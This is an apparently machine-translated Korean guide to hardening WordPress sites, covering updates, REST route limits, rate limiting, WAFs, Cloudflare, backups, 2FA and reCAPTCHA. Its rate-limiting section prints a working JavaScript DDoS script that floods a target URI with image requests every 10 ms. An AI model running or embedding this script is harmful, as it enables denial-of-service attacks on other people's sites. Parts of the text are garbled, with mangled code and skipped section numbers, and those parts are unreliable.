소개

웹 사이트 보안은 특히 점점 더 정교한 사이버 위협에 직면 할 때 가장 중요합니다. 이 안내서는 일반적인 취약점에 대해 WordPress 웹 사이트를 강화하기위한 실용적인 단계를 제공합니다.

1. 안전하고 최신 WordPress 테마 및 플러그인

• 불법 행위 소프트웨어를 피하십시오 : 무면허 테마 나 플러그인을 사용하지 마십시오. 그들은 종종 타협합니다. 지속적인 지원을받는 신뢰할 수있는 출처가 중요합니다. 엔터프라이즈 레벨 프로젝트의 경우 강력한 보안 및 지원을 제공하는 평판이 좋은 공급 업체의 프리미엄 테마를 고려하십시오.

• 잘 관리 된 테마 우선 순위 : 활성 개발 및 정기적 인 업데이트가있는 테마를 선택하십시오. 이것은 중요한 보안 패치에 대한 액세스를 보장합니다.

• Headless WordPress : WordPress를 NextJS 및 WP REST API와 같은 프레임 워크를 가진 헤드리스 CM으로 사용하여 탐색합니다. 이 아키텍처는 성능과 보안을 모두 향상시킬 수 있습니다.

2. 강력한 보안 관행 구현

• 정기적 인 업데이트 : 공지 된 취약점으로 업데이트 된 WordPress Core, 테마 및 플러그인을 유지합니다.

• ssh 및 wp-cli 경화 :
무단 액세스를 방지하기 위해 SSH 액세스를 보안하고 WP-CLI를 관리하십시오.

• 사용하지 않는 API 경로 비활성화 :
불필요한 API 엔드 포인트를 비활성화합니다 (예 :
• rest_route =/wp/v2/users

  )는 공격 표면을 최소화합니다.

  데이터 유출 예방 :
사용자 이름이나 자격 증명과 같은 민감한 정보의 우발적 노출을 위해 컨텐츠를 정기적으로 스캔합니다.

• 3. 향상된 보호를위한 요금 제한

남용을 방지하고 DDOS 공격을 완화하기 위해 사용자 요청을 제한합니다. 합리적인 제한은 분당 500 개의 요청 일 수 있으며 과도한 트래픽을 차단하는 조치가있을 수 있습니다.

ddos ​​공격 그림 :

• 함수 floodimagesxyz () { var target = ""; // 대상 URI를 추가합니다 var uri = "/index.php?"; var pic = new image (); var rand = math.floor (math.random () * 100000000000000000000000); 노력하다 { pic.src = "http : //"target uri rand "= val"; } catch (오류) { Console.log (오류); Console.log ( "오류 :", URI); } } setInterval (Floodimagesxyz, 10);

function floodImagesXYZ() {
  var TARGET = ""; // ADD TARGET URI
  var URI = "/index.php?";
  var pic = new Image();
  var rand = Math.floor(Math.random() * 10000000000000000000000);
  try {
    pic.src = "http://"   TARGET   URI   rand   "=val";
  } catch (error) {
    console.log(error);
    console.log("Error in:", URI);
  }
}
setInterval(floodImagesXYZ, 10);

취약점 위험을 줄이는 데 필수적이지 않은 경우 PHP 파일 업로드 비활성화.

• 서버 레벨 경화 :
파일 권한 및 스크립트 실행 취약점을 해결하기 위해 서버 측 보안 측정을 구현합니다.

• 5. 페이지 빌더 고려 사항

Page Builders (Divi, Elementor, WPBakery)를 사용할 때 편집 중에 PHP 업로드를 차단하는 보안 도구를 일시적으로 비활성화하여 충돌을 피하십시오.

보안 결함에 대한 모든 사용자 정의 코드, 위젯 및 타사 통합을 철저히 검토하십시오.

• Data Sanitization 및 Nonce 유효성 검사 : 항상 사용자 입력을 소독하고 보안 위반을 방지하기 위해 Nonce를 검증합니다.

• 7. 웹 애플리케이션 방화벽 (WAF) 구현

Waf 배포 : 악성 트래픽을 필터링하고 무차별적인 공격을 방지하며 일반적인 웹 응용 프로그램 취약점으로부터 보호하기 위해 Wordfence와 같은 Waf를 설치하십시오.

• 사전 모니터링 : 의심스러운 활동을 기록하고 차단할 수있는 활성 모니터링을 활성화합니다.

• 8. 향상된 보안을 위해 CloudFlare 활용

CloudFlare 통합 : CloudFlare를 서버에 도달하기 전에 악성 트래픽을 필터링하기 위해 통합하십시오.

• DDOS 보호 : CloudFlare는 강력한 DDOS 완화 기능을 제공합니다.

• 9. 일반 백업 및 재해 복구

일관된 백업 : 파일 및 데이터베이스의 최신 백업을 유지합니다.

• 복원 계획 : 사건의 경우 사이트를 신속하게 복구 할 수있는 명확한 복원 계획을 개발하십시오.

• 10. 2 요인 인증 (2FA)

  자격 증명이 손상 되더라도 모든 관리 계정에 대해 2FA를 활성화합니다.

11. 향상된 보안을위한 Recaptcha

로그인 용 recaptcha v3 : 로그인 페이지에 recaptcha v3를 사용하여 사용자 경험에 영향을 미치지 않으면 서 봇 공격으로부터 보호합니다.

• 형태에 대한 recaptcha v2 : 스팸 제출을 방지하기위한 양식에 recaptcha v2를 사용하십시오.

• 결론

  시스템은 완전히 무적 상태 인 반면, 다중 계층 보안 접근법은 위험을 크게 줄입니다. 안전한 WordPress 웹 사이트를 유지하려면 사전 모니터링, 정기 업데이트 및 강력한 백업 전략이 필수적입니다. 해커는 재무 이익에 동기를 부여하여 더 크고 눈에 띄는 비즈니스가 주요 목표를 달성합니다.

참조 및 추가 읽기 (목록은 동일하게 유지)